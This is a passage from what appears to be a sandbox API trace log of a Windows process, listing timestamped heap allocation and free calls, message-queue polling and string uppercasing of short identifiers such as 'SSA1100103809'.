hHeap=0x2af0000) returned 1 [0213.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0213.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab320 [0213.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a98 [0213.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab428 [0213.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1e8 [0213.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0213.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d88 [0213.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x12697) returned 0x2a8a138 [0213.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0213.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71c68 [0213.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab380 [0213.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d28 [0213.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0213.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ce8 [0213.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2f0 [0213.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c08 [0213.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0213.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71bb8 [0213.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab140 [0213.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d58 [0213.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0213.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab410 [0213.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0213.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab308 [0213.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d68 [0213.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0213.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0213.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab158 [0213.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c08 [0213.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x12697) returned 0x2ac0f18 [0213.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0213.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab398 [0213.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cb8 [0213.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab398 | out: hHeap=0x2af0000) returned 1 [0213.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0213.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab248 [0213.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0213.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab260 [0213.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c18 [0213.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab260 | out: hHeap=0x2af0000) returned 1 [0213.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0213.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab230 [0213.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0213.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab308 [0213.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c38 [0213.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0213.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0213.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab200 [0213.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0213.684] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c78 [0213.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c98 [0213.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3b0 [0213.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab290 [0213.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0213.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab368 [0213.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0213.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d28 [0213.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0213.685] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0213.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0213.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0213.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0213.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab290 | out: hHeap=0x2af0000) returned 1 [0213.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3b0 | out: hHeap=0x2af0000) returned 1 [0213.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0213.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0213.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0213.685] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0213.685] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab308 [0213.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cd8 [0213.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0213.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0213.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab398 [0213.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0213.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cc8 [0213.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0213.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab278 [0213.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c98 [0213.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab278 | out: hHeap=0x2af0000) returned 1 [0213.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0213.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab260 [0213.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab308 [0213.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0213.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0213.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab398 | out: hHeap=0x2af0000) returned 1 [0213.686] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0213.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ba8 [0213.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0213.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0213.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab398 [0213.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab278 [0213.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c48 [0213.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0213.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab188 [0213.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d28 [0213.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab188 | out: hHeap=0x2af0000) returned 1 [0213.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0213.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab188 [0213.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1a0 [0213.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0213.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0213.687] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab398 | out: hHeap=0x2af0000) returned 1 [0213.687] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab398 [0213.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c78 [0213.687] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab398 | out: hHeap=0x2af0000) returned 1 [0213.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0213.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab368 [0213.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1b8 [0213.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d08 [0213.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0213.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1d0 [0213.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cd8 [0213.687] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1d0 | out: hHeap=0x2af0000) returned 1 [0213.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0213.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab290 [0213.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0213.687] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0213.687] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0213.687] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0213.687] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2a8 [0213.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d48 [0213.687] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2a8 | out: hHeap=0x2af0000) returned 1 [0213.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0213.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab368 [0213.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1d0 [0213.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d78 [0213.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0213.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2a8 [0213.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d58 [0213.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2a8 | out: hHeap=0x2af0000) returned 1 [0213.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0213.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab398 [0213.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2a8 [0213.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0213.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0213.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0213.688] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab368 [0213.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0213.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0213.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0213.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab368 [0213.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3b0 [0213.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71be8 [0213.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0213.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0213.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ba8 [0213.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0213.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0213.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5f0 [0213.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6b0 [0213.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0213.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0213.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0213.688] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0213.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bf8 [0213.689] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0213.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0213.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0213.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab368 [0213.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0213.689] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0213.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0213.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d48 [0213.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0213.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0213.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d38 [0213.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0213.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0213.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bf8 [0213.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0213.689] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0213.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0213.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0213.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0213.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0213.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0213.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0213.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0213.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0213.689] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0213.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0213.690] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0213.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d38 [0213.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0213.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0213.690] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0213.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0213.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0213.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab620 [0213.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x38549c8 [0213.690] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0213.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d48 [0213.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c78 [0213.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0213.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0213.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0213.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6c8 [0213.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0213.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bf8 [0213.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0213.690] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0213.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0213.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0213.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6c8 | out: hHeap=0x2af0000) returned 1 [0213.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0213.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0213.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0213.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0213.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0213.691] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0213.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0213.691] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0213.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c78 [0213.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0213.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab608 [0213.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0213.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d48 [0213.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0213.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0213.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0213.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0213.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab608 | out: hHeap=0x2af0000) returned 1 [0213.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0213.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0213.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x38549c8 | out: hHeap=0x2af0000) returned 1 [0213.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0213.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c78 [0213.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7200 [0213.692] RtlAllocateHeap (HeapHandle=0x2af0000, 